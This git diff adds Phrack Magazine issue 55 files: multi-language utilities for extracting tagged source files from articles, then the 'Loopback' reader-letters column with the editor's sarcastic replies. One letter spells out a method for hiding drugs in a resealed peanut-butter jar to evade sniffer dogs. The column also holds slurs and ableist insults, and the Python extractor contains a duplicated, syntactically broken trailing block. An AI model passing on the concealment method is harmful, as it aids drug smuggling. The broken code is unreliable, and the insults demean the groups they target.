+New this issue: The C version has support for crc checks.
+
+
+---------------------8<------------CUT-HERE----------->8---------------------
+
+<++> P55/EX/PMEU/extract4.c !9d35b676
+/*
+ *  extract.c by Phrack Staff and sirsyko
+ *
+ *  Copyright (c) 1997 - 1999 Phrack Magazine
+ *
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ *
+ *  extract.c
+ *  Extracts textfiles from a specially tagged flatfile into a hierarchical 
+ *  directory structure.  Use to extract source code from any of the articles 
+ *  in Phrack Magazine (first appeared in Phrack 50).
+ *
+ *  Extraction tags are of the form:
+ *
+ *  host:~> cat testfile
+ *  irrelevant file contents
+ *  <++> path_and_filename1 !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  <++> path_and_filename2 !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  <++> path_and_filenamen !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  EOF
+ *
+ *  The `!CRC` is optional.  The filename is not.  To generate crc32 values 
+ *  for your files, simply give them a dummy value initially.  The program
+ *  will attempt to verify the crc and fail, dumping the expected crc value.
+ *  Use that one.  i.e.:
+ *
+ *  host:~> cat testfile
+ *  this text is ignored by the program
+ *  <++> testarooni !12345678
+ *  text to extract into a file named testarooni
+ *  as is this text
+ *  <--> 
+ *
+ *  host:~> ./extract testfile
+ *  Opened testfile
+ *   - Extracting testarooni
+ *   crc32 failed (12345678 != 4a298f18)
+ *  Extracted 1 file(s).  
+ *
+ *  You would use `4a298f18` as your crc value.
+ *
+ *  Compilation:
+ *  gcc -o extract extract.c
+ *  
+ *  ./extract file1 file2 ... filen
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <string.h>
+#include <dirent.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <errno.h>
+
+#define BEGIN_TAG   "<++> "
+#define END_TAG     "<-->"
+#define BT_SIZE     strlen(BEGIN_TAG)
+#define ET_SIZE     strlen(END_TAG)
+
+struct f_name
+{
+    u_char name[256];
+    struct f_name *next;
+};
+
+unsigned long crcTable[256];
+
+
+void crcgen() 
+{
+    unsigned long crc, poly;
+    int i, j;
+    poly = 0xEDB88320L;
+    for (i = 0; i < 256; i++)
+    {
+        crc = i;
+        for (j = 8; j > 0; j--)
+        {
+            if (crc & 1)
+            {
+                crc = (crc >> 1) ^ poly;
+            } 
+            else
+            {
+                crc >>= 1;
+            }
+        }
+        crcTable[i] = crc;
+    }
+}
+
+        
+unsigned long check_crc(FILE *fp)
+{
+    register unsigned long crc;
+    int c;
+
+    crc = 0xFFFFFFFF;
+    while( (c = getc(fp)) != EOF )
+    {
+         crc = ((crc >> 8) & 0x00FFFFFF) ^ crcTable[(crc ^ c) & 0xFF];
+    }
+ 
+    if (fseek(fp, 0, SEEK_SET) == -1)
+    {
+        perror("fseek");
+        exit(EXIT_FAILURE);
+    }
+
+    return (crc ^ 0xFFFFFFFF);
+}
+
+
+int
+main(int argc, char **argv)
+{ 
+    u_char b[256], *bp, *fn;
+    int i, j = 0, h_c = 0;
+    unsigned long crc = 0, crc_f = 0;
+    FILE *in_p, *out_p = NULL; 
+    struct f_name *fn_p = NULL, *head = NULL, *tmp = NULL;
+    char *name;
+
+    if (argc < 2)
+    {
+        printf("Usage: %s file1 file2 ... filen\n", argv[0]);
+        exit(0); 
+    }
+
+    /*
+     *  Fill the f_name list with all the files on the commandline (ignoring
+     *  argv[0] which is this executable).  This includes globs.
+     */
+    for (i = 1; (fn = argv[i++]); )
+    {
+        if (!head)
+        {
+            if (!(head = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(EXIT_FAILURE);
+            }
+            strncpy(head->name, fn, sizeof(head->name));
+            head->next = NULL;
+            fn_p = head;
+        }
+        else
+        {
+            if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(EXIT_FAILURE);
+            }
+            fn_p = fn_p->next;
+            strncpy(fn_p->name, fn, sizeof(fn_p->name));
+            fn_p->next = NULL;
+        }
+    }
+    /*
+     *  Sentry node.
+     */
+    if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+    {
+        perror("malloc");
+        exit(EXIT_FAILURE);
+     }
+    fn_p = fn_p->next;
+    fn_p->next = NULL;
+
+    /*
+     *  Check each file in the f_name list for extraction tags.
+     */
+    for (fn_p = head; fn_p->next; )
+    {
+        if (!strcmp(fn_p->name, "-"))
+        {
+            in_p = stdin;
+            name = "stdin";
+        }
+        else if (!(in_p = fopen(fn_p->name, "r")))
+        {
+            fprintf(stderr, "Could not open input file %s.\n", fn_p->name);
+	    continue;
+        }
+        else
+        {
+            name = fn_p->name;
+        }
+        fprintf(stderr, "Scanning %s...\n", fn_p->name);
+
+        crcgen();
+        while (fgets(b, 256, in_p))
+        { 
+            if (!strncmp(b, BEGIN_TAG, BT_SIZE))
+            {
+	        b[strlen(b) - 1] = 0;           /* Now we have a string. */
+                j++;
+
+                crc = 0;
+                crc_f = 0;
+                if ((bp = strchr(b + BT_SIZE + 1, '/')))
+                {
+                    while (bp)
+                    {
+		        *bp = 0;
+                        if (mkdir(b + BT_SIZE, 0700) == -1 && errno != EEXIST)
+                        {
+                            perror("mkdir");
+                            exit(EXIT_FAILURE);
+                        }
+                        *bp = '/';
+		        bp = strchr(bp + 1, '/'); 
+		    }
+                }
+
+                if ((bp = strchr(b, '!')))
+                {
+                    crc_f = 
+                        strtoul((b + (strlen(b) - strlen(bp)) + 1), NULL, 16);
+                   b[strlen(b) - strlen(bp) - 1 ] = 0;
+                   h_c = 1;
+                }
+                else
+                {
+                    h_c = 0;
+                }
+                if ((out_p = fopen(b + BT_SIZE, "wb+")))
+                {
+                    printf(". Extracting %s\n", b + BT_SIZE);
+                }
+                else
+                {
+        	    printf(". Could not extract anything from '%s'.\n",
+                        b + BT_SIZE);
+        	    continue;
+                }
+            }
+            else if (!strncmp (b, END_TAG, ET_SIZE))
+            {
+                if (out_p)
+                {
+                    if (h_c == 1)
+                    {
+                        if (fseek(out_p, 0l, 0) == -1)
+                        {
+                            perror("fseek");
+                            exit(EXIT_FAILURE);
+                        }
+                        crc = check_crc(out_p);
+                        if (crc == crc_f)
+                        {
+                           printf(". CRC32 verified (%08lx)\n", crc);
+                        }
+                        else
+                        {
+                           printf(". CRC32 failed (%08lx != %08lx)\n",
+                               crc_f, crc);
+                        }
+                    }
+                    fclose(out_p);
+                }
+	        else
+                {
+	            fprintf(stderr, ". `%s` had bad tags.\n", fn_p->name);
+		    continue;
+	        }
+            }
+            else if (out_p)
+            {
+                fputs(b, out_p);
+            }
+        }
+        if (in_p != stdin)
+        {
+            fclose(in_p);
+        }
+        tmp = fn_p;
+        fn_p = fn_p->next;
+        free(tmp);                      
+    }
+    if (!j)
+    {
+        printf("No extraction tags found in list.\n");
+    }
+    else
+    {
+        printf("Extracted %d file(s).\n", j);
+    }
+    return (0);
+}
+
+/* EOF */
+<-->
+<++> P55/EX/PMEU/extract.pl !1a19d427
+# Daos <daos@nym.alias.net>
+#!/bin/sh -- # -*- perl -*- -n
+eval 'exec perl $0 -S ${1+"$@"}' if 0;
+
+$opening=0;
+
+if (/^\<\+\+\>/) {$curfile = substr($_ , 5); $opening=1;};
+if (/^\<\-\-\>/) {close ct_ex; $opened=0;}; 
+if ($opening) {                        
+        chop $curfile;                 
+        $sex_dir= substr( $curfile, 0, ((rindex($curfile,'/'))) ) if ($curfile =~ m/\//);
+        eval {mkdir $sex_dir, "0777";}; 
+        open(ct_ex,">$curfile"); 
+        print "Attempting extraction of $curfile\n";
+        $opened=1; 
+}
+if ($opened && !$opening) {print ct_ex $_}; 
+<-->
+
+<++> P55/EX/PMEU/extract.awk !26522c51
+#!/usr/bin/awk -f
+#
+# Yet Another Extraction Script
+# - <sirsyko>
+#
+/^\<\+\+\>/ {
+        ind = 1
+        File = $2
+        split ($2, dirs, "/")
+        Dir="."
+        while ( dirs[ind+1] ) {
+                Dir=Dir"/"dirs[ind]
+                system ("mkdir " Dir" 2>/dev/null")
+                ++ind
+        }
+        next
+}
+/^\<\-\-\>/ {
+        File = ""
+        next
+}
+File { print >> File }
+<-->
+<++> P55/EX/PMEU/extract.sh !a81a2320
+#!/bin/sh
+# exctract.sh : Written 9/2/1997 for the Phrack Staff by <sirsyko>
+#
+# note, this file will create all directories relative to the current directory
+# originally a bug, I've now upgraded it to a feature since I dont want to deal
+# with the leading / (besides, you dont want hackers giving you full pathnames
+# anyway, now do you :)
+# Hopefully this will demonstrate another useful aspect of IFS other than 
+# haxoring rewt
+#
+# Usage: ./extract.sh <filename>
+
+cat $* | (
+Working=1
+while [ $Working ];
+do
+        OLDIFS1="$IFS"
+        IFS=
+        if read Line; then
+                IFS="$OLDIFS1"
+                set -- $Line
+                case "$1" in
+                "<++>") OLDIFS2="$IFS"
+                        IFS=/
+                        set -- $2
+                        IFS="$OLDIFS2"
+                        while [ $# -gt 1 ]; do
+                                File=${File:-"."}/$1
+                                if [ ! -d $File ]; then
+                                        echo "Making dir $File"
+                                        mkdir $File
+                                fi
+                                shift
+                        done                               
+                        File=${File:-"."}/$1
+                        echo "Storing data in $File"
+                ;;
+                "<-->") if [ "x$File" != "x" ]; then
+                                unset File
+                        fi ;;
+                *)      if [ "x$File" != "x" ]; then
+                                        IFS=
+                                        echo "$Line" >> $File
+                                        IFS="$OLDIFS1"
+                        fi
+                ;;
+                esac
+                IFS="$OLDIFS1"
+        else
+                echo "End of file"
+                unset Working
+        fi
+done
+)                                                                    
+<-->
+<++> P55/EX/PMEU/extract.py !83f65f60
+#! /bin/env python
+# extract.py    Timmy 2tone <_spoon_@usa.net>
+
+import sys, string, getopt, os
+
+class Datasink:
+    """Looks like a file, but doesn't do anything."""
+    def write(self, data): pass
+    def close(self): pass
+
+def extract(input, verbose = 1):
+    """Read a file from input until we find the end token."""
+
+    if type(input) == type('string'):
+        fname = input
+        try: input = open(fname)
+        except IOError, (errno, why):
+            print "Can't open %s: %s" % (fname, why)
+            return errno
+    else:
+        fname = '<file descriptor %d>' % input.fileno()
+
+    inside_embedded_file = 0
+    linecount = 0
+    line = input.readline()
+    while line:
+
+        if not inside_embedded_file and line[:4] == '<++>':
+
+            inside_embedded_file = 1
+            linecount = 0
+
+            filename = string.strip(line[4:])
+            if mkdirs_if_any(filename) != 0:
+                pass
+
+            try: output = open(filename, 'w')
+            except IOError, (errno, why):
+                print "Can't open %s: %s; skipping file" % (filename, why)
+                output = Datasink()
+                continue
+
+            if verbose:
+                print 'Extracting embedded file %s from %s...' % (filename,
+                                                                  fname),
+
+        elif inside_embedded_file and line[:4] == '<-->':
+            output.close()
+            inside_embedded_file = 0
+            if verbose and not isinstance(output, Datasink):
+                print '[%d lines]' % linecount
+
+        elif inside_embedded_file:
+            output.write(line)
+
+        # Else keep looking for a start token.
+        line = input.readline()
+        linecount = linecount + 1
+
+def mkdirs_if_any(filename, verbose = 1):
+    """Check for existance of /'s in filename, and make directories."""
+
+    path, file = os.path.split(filename)
+    if not path: return
+
+    errno = 0
+    start = os.getcwd()
+    components = string.split(path, os.sep)
+    for dir in components:
+        if not os.path.exists(dir):
+            try:
+                os.mkdir(dir)
+                if verbose: print 'Created directory', path
+
+            except os.error, (errno, why):
+                print "Can't make directory %s: %s" % (dir, why)
+                break
+
+        try: os.chdir(dir)
+        except os.error, (errno, why):
+            print "Can't cd to directory %s: %s" % (dir, why)
+            break
+
+    os.chdir(start)
+    return errno
+
+def usage():
+    """Blah."""
+    die('Usage: extract.py [-V] filename [filename...]')
+
+def main():
+    try: optlist, args = getopt.getopt(sys.argv[1:], 'V')
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = ['-v', filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass
+
+
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = [filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass              # No messy traceback.
+<-->
+<++> P55/EX/PMEU/extract-win.c !e519375d
+/***************************************************************************/
+/* WinExtract                                                              */
+/*                                                                         */
+/* Written by Fotonik <fotonik@game-master.com>.                           */
+/*                                                                         */
+/* Coding of WinExtract started on 22aug98.                                */
+/*                                                                         */
+/* This version (1.0) was last modified on 22aug98.                        */
+/*                                                                         */
+/* This is a Win32 program to extract text files from a specially tagged   */
+/* flat file into a hierarchical directory structure.  Use to extract      */
+/* source code from articles in Phrack Magazine.  The latest version of    */
+/* this program (both source and executable codes) can be found on my      */
+/* website:  http://www.altern.com/fotonik                                 */
+/***************************************************************************/
+
+
+#include <stdio.h>
+#include <string.h>
+#include <windows.h>
+
+
+void PowerCreateDirectory(char *DirectoryName);
+
+
+int WINAPI WinMain(HINSTANCE hThisInst, HINSTANCE hPrevInst,
+                   LPSTR lpszArgs, int nWinMode)
+{
+OPENFILENAME OpenFile; /* Structure for Open common dialog box */
+char InFileName[256]="";
+char OutFileName[256];
+char Title[]="WinExtract - Choose a file to extract files from.";
+FILE *InFile;
+FILE *OutFile;
+char Line[256];
+char DirName[256];
+int FileExtracted=0;   /* Flag used to determine if at least one file was */
+int i;                 /* extracted */
+
+ZeroMemory(&OpenFile, sizeof(OPENFILENAME));
+OpenFile.lStructSize=sizeof(OPENFILENAME);
+OpenFile.hwndOwner=HWND_DESKTOP;
+OpenFile.hInstance=hThisInst;
+OpenFile.lpstrFile=InFileName;
+OpenFile.nMaxFile=sizeof(InFileName)-1;
+OpenFile.lpstrTitle=Title;
+OpenFile.Flags=OFN_FILEMUSTEXIST | OFN_HIDEREADONLY;
+
+if(GetOpenFileName(&OpenFile))
+   {
+   if((InFile=fopen(InFileName,"r"))==NULL)
+      {
+      MessageBox(NULL,"Could not open file.",NULL,MB_OK);
+      return 0;
+      }
+
+   /* If we got here, InFile is opened. */
+   while(fgets(Line,256,InFile))
+      {
+      if(!strncmp(Line,"<++> ",5)) /* If line begins with "<++> " */
+         {
+         Line[strlen(Line)-1]='\0';
+         strcpy(OutFileName,Line+5);
+
+         /* Check if a dir has to be created and create one if necessary */
+         for(i=strlen(OutFileName)-1;i>=0;i--)
+            {
+            if((OutFileName[i]=='\\')||(OutFileName[i]=='/'))
+               {
+               strncpy(DirName,OutFileName,i);
+               DirName[i]='\0';
+               PowerCreateDirectory(DirName);
+               break;
+               }
+            }
+
+         if((OutFile=fopen(OutFileName,"w"))==NULL)
+            {
+            MessageBox(NULL,"Could not create file.",NULL,MB_OK);
+            fclose(InFile);
+            return 0;
+            }
+
+         /* If we got here, OutFile can be written to */
+         while(fgets(Line,256,InFile))
+            {
+            if(strncmp(Line,"<-->",4)) /* If line doesn't begin w/ "<-->" */
+               {
+               fputs(Line, OutFile);
+               }
+            else
+               {
+               break;
+               }
+            }
+         fclose(OutFile);
+         FileExtracted=1;
+         }
+      }
+   fclose(InFile);
+   if(FileExtracted)
+      {
+      MessageBox(NULL,"Extraction sucessful.","WinExtract",MB_OK);
+      }
+   else
+      {
+      MessageBox(NULL,"Nothing to extract.","Warning",MB_OK);
+      }
+   }
+   return 1;
+}
+
+
+/* PowerCreateDirectory is a function that creates directories that are */
+/* down more than one yet unexisting directory levels.  (e.g. c:\1\2\3) */
+void PowerCreateDirectory(char *DirectoryName)
+{
+int i;
+int DirNameLength=strlen(DirectoryName);
+char DirToBeCreated[256];
+
+for(i=1;i<DirNameLength;i++) /* i starts at 1, because we never need to */
+   {                         /* create '/' */
+   if((DirectoryName[i]=='\\')||(DirectoryName[i]=='/')||
+      (i==DirNameLength-1))
+      {
+      strncpy(DirToBeCreated,DirectoryName,i+1);
+      DirToBeCreated[i+1]='\0';
+      CreateDirectory(DirToBeCreated,NULL);
+      }
+   }
+}
+<-->
+----[  EOF
diff --git a/phrack55/2.txt b/phrack55/2.txt
new file mode 100644
index 0000000..dc170bb
--- /dev/null
+++ b/phrack55/2.txt
@@ -0,0 +1,1402 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 02 of 19  ]
+
+
+-------------------------[  P H R A C K     5 5     L O O P B A C K  ]
+
+
+--------[  Phrack Staff  ]
+
+
+Phrack Loopback is your chance to write to the Phrack staff with your
+comments, questions, or whatever.  The responses are generally written by
+the editor, except where noted.  The actual letters are perhaps edited
+for format, but generally not for grammar and/or spelling.  We try not to
+correct the vernacular, as it often adds a colorful perspective to the
+letter in question.
+
+Thanks to kamee and loadammo for their help.
+
+0x01>-------------------------------------------------------------------------
+
+route, you suck--all you phrack people do.
+
+    [ Extra double dumb-ass on us! ]
+
+you would think 8 months is enough time to put out phrack 55, but NO.
+
+    [ You *would* think so, wouldn't you?  I *knew* I should have quit my
+      job.  Well, I'm certain you spent the downtime working on your
+      world-renown top-notch freely distributed highly-technical ezine
+      right?  How many issues did you pump out?  2?  3?  Where can we get
+      it? ]
+
+You say it will be out on August 31, now it is September 9?
+
+    [ 09.09.99 is so much more of an elite date than 08.31.99.  In fact,
+      09.09.99 is the most elite date of our lifetime. ]
+
+Faggots.
+
+    [ Is uh..  Is that a proposition?  Are you looking for some action or
+      something? ]
+
+- grez@vulgar.net
+
+    [ Thanks man!  Now everyone knows where to send the love! ]
+
+0x02>-------------------------------------------------------------------------
+
+I'm a San Francisco criminal defense attorney, and, because I believe curiosity
+should not be a crime and information wants to be free, I hereby volunteer my
+legal services to Phrack readers.  For a free legal consultation, contact me,
+Omar Figueroa, Esq. at omar@alumni.stanford.org or (415) 986-5591.
+http://www.2xtreme.net/omar/
+
+    [ Very cool.  I'm sure many readers if nothing else will at least have
+      questions regarding the law and how it impacts their rarified
+      profession...  Keep in mind Omar that many 'hacker'-types requiring
+      legal services are prone to idiocy and therefore not likely to have
+      money.  Hope you're up for some good ole-fashioned pro bono work! ]
+
+0x03>-------------------------------------------------------------------------
+
+Hey, glad to see your site back up, I was beginning to wonder what
+happened...
+
+    [ Alhambra tripped over the power cord.  We didn't notice for a few
+      months.  Our bad. ]
+
+While you were down, an item came up on my Zen calendar that I thought
+you might enjoy:
+
+    [ The `Zen Calander`?   Does it have pictures of Shakyamuni Buddha in
+      a bikini? ]
+
+"The shell must be cracked apart if what is in it is to come out, for
+if you want the kernel you must break the shell.  And therefore, if
+you want to discover nature's nakedness, you must destroy its symbols,
+and the farther you get in, the nearer you come to its essence.  When
+you come to the One that gathers all things up into itself, there your
+soul must stay."  -Meister Eckhart
+
+hmmm....
+
+    [ Man that's just great.  I'm going to go dunk my head in a pot of
+      boiling water now.  Be right back... ]
+
+Anyway, Phrack is a *great* mag, keep up the good work.
+
+    [ Agreed.  Thanks. ]
+
+- ped xing
+
+0x04>-------------------------------------------------------------------------
+
+I don't have a computer yet because I don't know to much about it??
+
+    [ Are you asking me or telling me?  And if you're sans computer, how
+      the hell are you writing me this email?   OMG!  Are we communicating
+      through your mind?!?@!  Are you using the /shining/?  Ok.  You can
+      use yer shining to call me when you need my help...  But don't be
+      reading my mind between 4 and 5.  That's _route's_ time.  STAY OUT! ]
+
+but the basic things but i been trying to get to some underground site
+which willput me in the write direction,into hacking...
+
+    [ I'm suggesting you spend that computer money on some at-home ESL
+      classes. ]
+
+in your site is off the hook,it has infor that i can use thanx
+
+    [ Yes, when I'm watching a movie or I don't want to be bothered, I
+      take www.phrack.com off the hook. ]
+
+I  know i may not be answered back but can you send me some site that may
+help me into starting my long journey of hacking 
+
+    [ http://owl.english.purdue.edu/esl/ESL-student.html ]
+
+...thank you...in my email is weeddreams@yahoo.com
+
+0x05>-------------------------------------------------------------------------
+
+Hi,
+   
+I am a wannabe hacker.
+
+    [ I'm a wannabe rockstar.  Wanna hang out? ]
+
+I have access to all the equipment. modems, routers, even my own pbx.
+
+    [ Well that's a start!  I suggest the next step should be actually 
+      getting a computer of some sort so all that networking hardware
+      doesn't go to waste! ]
+
+Where will i find material describing typical methods to test the systems
+for security. (TCP- SYN attack, ip-spoofing)
+
+    [ Phrack Magazine, issues 48 - 53. ]
+
+I am especially interested in DOS attacks.
+
+    [ And why not?  You seem like a highly intelligent guy.  I'll give you
+      a heads up on a particularly nasty one (as yet unreleased) certain to
+      take down even the most resilient hosts: Send the following 4 packets to
+      the target host:
+            1 - TCP SYN|RST with ISN == (2^32 - 0x12A3) to a LISTENing port
+            2 - TCP ACK with SEQ_ACK == (0x12A4) to same port
+            3 - ICMP_PORT_UNREACH (IP header inside is irrelevant)
+            4 - UDP to same port
+      Next, quickly douse your computer in lighter fluid, and set it on fire.
+      Wait a few minutes, then try and reach that host.  You'll find that you
+      can't.  Thank me later. ]
+
+Any pointers will be appreciated.
+
+    [ void *you = NULL; ]
+
+- LordKrishna
+
+0x06>-------------------------------------------------------------------------
+
+I know quite a bit about computers and started learning to program (or trying
+at least - I had trouble figuring out what the hell a variable  was) when
+I was like seven.
+
+    [ Yah, variables are tricky -- don't use them.  Stick to symbolic
+      constants. ]
+
+Now, I'm kinda' interested in hacking and phreaking, but I have seen many
+files out there from the 80's and early 90's that probably have little or
+no significance know.
+
+    [ As useless as 1950's porn. ]
+
+I have seen plans for blue boxes and red boxes everywhere, but I am assuming
+that this does not work anymore, since as stupid as phone companies are often
+depicted, I'm sure they have managed to fix these problems by now.
+
+    [ I have seen plans for world domination everywhere, and not even those
+      work.  Personally, I want my money back. ]
+
+However, I'm sure that there's still lots to do as far as phreaking goes,
+and definately hacking, because I hear about that all the time.
+
+    [ I don't think anyone's ever hacked a tic-tac before.  You could
+      start there! ]
+
+Anyway, I was wondering if you or someone else you know would care to write a
+file describing what works and doesn't in the modern world.  I love to read
+Phrack, but a lot of the older issues are either over my head
+
+    [ Me too!  I especially have problems with P25-05, P27-08, P28-06. 
+      I don't understand the need for wild turkeys when hacking.  Maybe
+      it was a fad 10 years ago. ]
+
+or seem more or less irrelevant.  As you, and most other hackers/phreaks,
+probably grew up when computers were still in earlier stages,
+
+    [ Yep.  My first computer was a rock and some dirt. ]
+
+you probably know a lot more about how they work than newer programmers.
+
+    [ Oh hell yes!  Think of a computer as a tiny, super complex street
+      hooker.  The more you put in..  Wait.  No.  That's not a good
+      analogy...   Um...  A computer is like a piece of paper.  Er.  No.
+      Um.  I really have no idea how they work. ]
+
+I can tell this just by reading this ASM book I got.  I had no idea what
+kinda' stuff happened with the actual hardware and its fun to learn.
+
+    [ Hrm.  Do you think maybe we could get together one night and
+      you could read to me?  Softly? ]
+
+Basically, I just want a modern beginner's guide so I can go out and get my
+feet wet.
+
+    [ Well jump right in!  The idiot pool has plenty of space and I'm
+      told the new spa has a diving board. ]   
+
+Most of the literature I have seen on phreaking/basic hacking is really old,
+so if you know of anything modern I could look at, or would like to write
+something yourself, I'd appreciate this quite a bit.
+
+    [ Have you tried searching for "hack +modern" on altavista? ]
+
+Thanks a lot, man.
+
+- Cyber Guy
+
+    [ Great handle man! ]
+
+0x07>-------------------------------------------------------------------------
+
+hia chief
+
+    [ Heya dorko. ]
+
+my nick is spider
+
+    [ How creative.  Chalk has more flavor. ]
+
+i'm a future hacker to be for now i need info about a free server
+
+    [ That's nice.  I need info on how to make girls like me.  I think we
+      can probably help each other. ]
+
+- spider.
+
+    [ Great handle man! ]
+
+0x08>-------------------------------------------------------------------------
+
+phreaks, i have recently discovered your site.
+
+    [ Congratulations.  I've recently discovered how to love. ]
+
+i must say i was impressed by the contents.
+
+    [ Well thank you very much!  Sounds good so far... ]
+
+i live in japan, the drug trade here is good but very expensive.
+
+    [ Hrm.  Have you tried switching to generics?  I know acetylsalicylic
+      acid is sold in many generic forms. ]
+
+so i import cid and x from the states...one problem....they have a police 
+
+    [ Japan has to import Caller ID? ]
+
+dog to sniff every item before it is mailed. i have found a way to by pass
+this. first get a new unopened peanut butter jar....take the seal off very
+
+    [ Hrm.  Skippy or Jiff?  Glass Jar or Plastic?  Crunchy or smooth?
+      And how big?  What about peanut butter cookies?  Will they work?
+      Please people...  Before you send in some half-cocked scheme, take
+      2 minutes and do some research. ]
+
+carefully dont rip it....scoop out a good amout of pb from the center..
+carfully place "the stuff" inside a plastic bag and place into the jar...
+recover with the pb.....
+
+    [ What do I do with the extra peanut butter?  Can I use it to make a
+      samich?  Or should I hold on to it for safe keeping? ]
+
+place the seal back ontop and iron on....this gives back its unopened
+look...next place lid back on top and your ready to be inspected.
+
+- Sloshkin
+
+    [ Well nice going Sloshkin!  You've managed to ruined this completely
+      lame drug trafficking technique for moronic drug smugglers!  All FBI
+      agents please contact your DEA pals!  Tell them to be on the lookout
+      for peanut butter. ]
+    
+0x09>-------------------------------------------------------------------------
+
+Due to the slow net,I have diffculty to download your excellent articles.
+  
+    [ Yep.  It's all the porn trafficking going on. ] 
+
+Can you do me the favor to send it to me by email?
+
+    [ Not a problem, expect them in 6 - 8 weeks. ]
+
+I will not do harm to anyone,I swear.
+
+    [ Better not.  Phrack is equipped with explosive dye packs.  If you
+      do something illicit they will explode all over your hands and face
+      and the authorities will be alerted. ]
+
+0x0a>-------------------------------------------------------------------------
+
+I sing and play guitair in a fairly unique punk band called "The gods
+Hate Kansas".
+
+    [ Really?  That's coincidental because I hate Kansas. ]
+
+Our lyrics and beleifs tend to revolve around corporate and governmental
+sabotage.
+
+    [ Excellent idea.  Let's collapse our economy and destroy the
+      government.  Better yet, let's beat terrorist extremists (like
+      Osama Bin Ladin) to the punch and blow ourselves up.  Do you have
+      any idea how much they hate Americans?  Oh wait, they're just
+      `Wag The Dog` inventions, right? ]
+
+Right now, we're gearing up to record in June.  The new CD will only be
+about 5 songs so we decided to make it a "multi-media" CD and include a
+couple videos, our website, and some misc. files on lockping, redboxing,
+and hacking.
+
+    [ Those free AOL CDs sound better.  Must miss! ]
+
+I was wondering if you might have anything that you might specificly want
+to contribute to this effort.
+
+    [ Just my unending sarcasm.  Oh, BTW I was being sarcastic. ]
+
+The punk scene is a wonderfull breeding ground of discontent and has a lot
+of paralels to hacker culture
+
+    [ Hackers are discontent?  Hrm.  Larry Wall seems pretty happy.  And I
+      don't think he likes punk. ]
+
+and this CD has the potential to reach a lot of people..
+
+    [ Like all the 15 year old disgruntled suburban kids in Kansas who think
+      they `have it rough at home` and `no one understands their shit` so 
+      they get their noses pierced along with lame haircuts and hang out
+      at seedy hardcore clubs! ]
+
+- Rion   
+
+0x0b>-------------------------------------------------------------------------
+
+WUZ ^
+
+    [ How preciously retarded! ]
+
+I found my schools dial-up and I want you guys to try and hack it if you can.
+ITS: xxx-7035 St. Francis Jr. High.  Fuck it up as much as possible please!
+
+    [ Dude, somehow I don't think it would right for us to hack into a
+      `special` education school.  I think you should just get back to your
+      room, back into your restraints, and back on the meds. ]
+
+They have an entire network of macs and ibm's.
+
+    [ All hooked up to machines to keep you guys from drooling. ]
+
+0x0c>-------------------------------------------------------------------------
+
+Sup, I am interested in hacking. I do not know much about how to hack and
+want to learn more. I want to try and get a password from a certain somebody to
+read their mail.
+
+    [ Well, genius, TRY ASKING. ]
+
+I opened up an account at wowmail to check it out.  I found out that once
+you are in your own account that if u view source...it actually shows you
+your password!
+
+    [ NO WAY@!#!  HOLY SHIT THAT'S INCREDIBLE! ]
+
+So...is there a way to write a program where when a user tries to open
+their mail...somehow u can view source and send it back to your e-mail
+account without the user ever finding out?
+
+    [ Jesus, let her go man and mind that restraining order. ]
+
+Or is there another way u could tell me how I could obtain the password
+and how to go about it?
+
+    [ Spy for love.  Pattern yourself after the Stasi Super-Romeo Roland G.
+      He won the affections of a lovely young woman named Margarete, an
+      interpreter at NATO's SHAPE (Supreme Headquarters Allied Powers Europe).
+      She divulged all kinds of secrets regarding Allied military manuvers
+      and whatnot. ]
+
+Thanx,
+Steve 
